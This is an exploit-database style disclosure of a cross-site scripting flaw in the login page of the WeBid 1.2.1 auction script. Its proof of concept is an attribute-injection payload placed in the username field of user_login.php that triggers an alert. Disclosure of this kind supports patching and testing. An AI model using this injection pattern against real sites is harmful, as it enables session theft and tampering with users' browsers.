####################################################################
# Exploit Title : WeBid 1.2.1 XSS Vulnerability
# Author [ Discovered By ] : Mehmet EMİROĞLU
# Date : 07/02/2019
# Vendor Homepage : http://www.webidsupport.com/index.php
# Software Download Link : https://sourceforge.net/projects/simpleauction/
# Affected Versions : 1.2.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
# Sofrware Description : Open source php/mysql fully featured auction script.
Perfect for those who want to start their own auction site.
####################################################################
# Impact :
*********
# This web application called as WeBid 1.2.1 version.
# The proof will be the picture below.
# https://i.hizliresim.com/r55qZP.jpg
####################################################################
# PoC :
****************************
# XSS Code : " onmouseover="alert(1007175)
# Post Request : http://localhost/[PATH]/user_login.php^csrftoken=&password=2829008&username=2871992" onmouseover="alert(1007175)
####################################################################